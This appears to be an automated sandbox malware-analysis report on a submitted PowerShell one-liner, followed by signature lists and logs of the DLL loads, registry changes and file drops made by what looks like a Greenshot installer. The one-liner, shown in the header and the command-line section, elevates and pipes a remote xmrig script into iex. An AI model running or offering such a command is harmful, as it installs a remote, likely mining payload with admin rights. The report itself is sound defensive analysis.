Malware Analysis Report

2024-12-07 17:07

Sample ID 241113-h7s3nazrhj
Target http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Tags
defense_evasion discovery execution persistence phishing privilege_escalation
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery execution persistence phishing privilege_escalation

Downloads MZ/PE file

Executes dropped EXE

A potential corporate email address has been identified in the URL: [email protected]

Loads dropped DLL

Command and Scripting Interpreter: PowerShell

Drops desktop.ini file(s)

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Checks installed software on the system

Subvert Trust Controls: Mark-of-the-Web Bypass

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Access Token Manipulation: Create Process with Token

Browser Information Discovery

Uses Task Scheduler COM API

NTFS ADS

Modifies Control Panel

Checks processor information in registry

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Runs ping.exe

Modifies registry key

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 07:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 07:23

Reported

2024-11-13 08:08

Platform

win11-20241007-en

Max time kernel

2700s

Max time network

2587s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Signatures

Downloads MZ/PE file

A potential corporate email address has been identified in the URL: [email protected]

phishing

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Greenshot = "C:\\Program Files\\Greenshot\\Greenshot.exe" C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A

Checks installed software on the system

discovery

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A camo.githubusercontent.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\GreenshotOCRCommand.exe C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\is-S9B53.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-ISPDR.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-18HKN.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-JT76M.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-F5RSP.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-04HRU.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-LR66V.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-SJJN3.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Plugins\GreenshotOfficePlugin\is-AH51K.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-RQ2MH.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-2IDCM.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-JUAQB.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-DRHL9.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-JBO19.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-UM4GL.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\unins000.msg C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\is-KU4Q9.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-MGM43.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-BMFRP.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-QKSBM.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-LDAO2.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-51T2U.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-55QDT.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File opened for modification C:\Program Files\Greenshot\Greenshot.exe C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\is-NPD97.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-A8OE1.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-9B7KD.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Plugins\GreenshotImgurPlugin\is-62VQ5.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-JDRPO.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-MJ7N1.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-LQ48H.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\is-RM7CL.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\is-8SRII.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\is-L67H6.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-OEK6B.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-F58TB.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-M0HBK.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-FQFNJ.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-0KCL5.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\is-Q9U9U.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-QNEPK.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-2G93M.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-A642T.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-676C9.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-57LJH.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-H9TUD.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\is-4EETE.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\is-77KNE.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-NACB9.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-C45DB.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-9A4RN.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-SSH4J.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-RA2F5.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\is-M310A.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-RCS7M.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-J6E5D.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-87R8S.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\is-5G9FT.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\is-98PL0.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\is-ENBUN.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File created C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-6D8RR.tmp C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
File opened for modification C:\Program Files\Greenshot\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index17.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\ngenlock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\indexc.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index14.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index15.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\index14.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\GACLock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index18.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Greenshot\1c7cbeae03e956efcf671a6f3ea6d088\Greenshot.ni.exe.aux.tmp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\GACLock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP9A4A.tmp\log4net.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\indexf.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\indexe.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\ngenlock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index11.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAPB285.tmp\System.Security.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\429d1f533624b62ab398cd9238b6be2f\System.Numerics.ni.dll.aux.tmp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\GreenshotPlugin\1fd5ba98e3dc7e9dedec5f51bdd3884a\GreenshotPlugin.ni.dll.aux.tmp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\LinqBridge\fe10f24c40ec4722ed97cf4c7d098e7c\LinqBridge.ni.dll.aux.tmp C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\indexe.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index12.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\index18.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP9C2E.tmp\System.Configuration.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\GACLock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index16.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index17.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index19.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\SystemTemp\tem4A0E.tmp C:\Windows\system32\Clipup.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e6c-0\GreenshotPlugin.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\ngenlock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\ngenlock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index10.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index12.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index16.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
File created C:\Windows\assembly\GACLock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe N/A
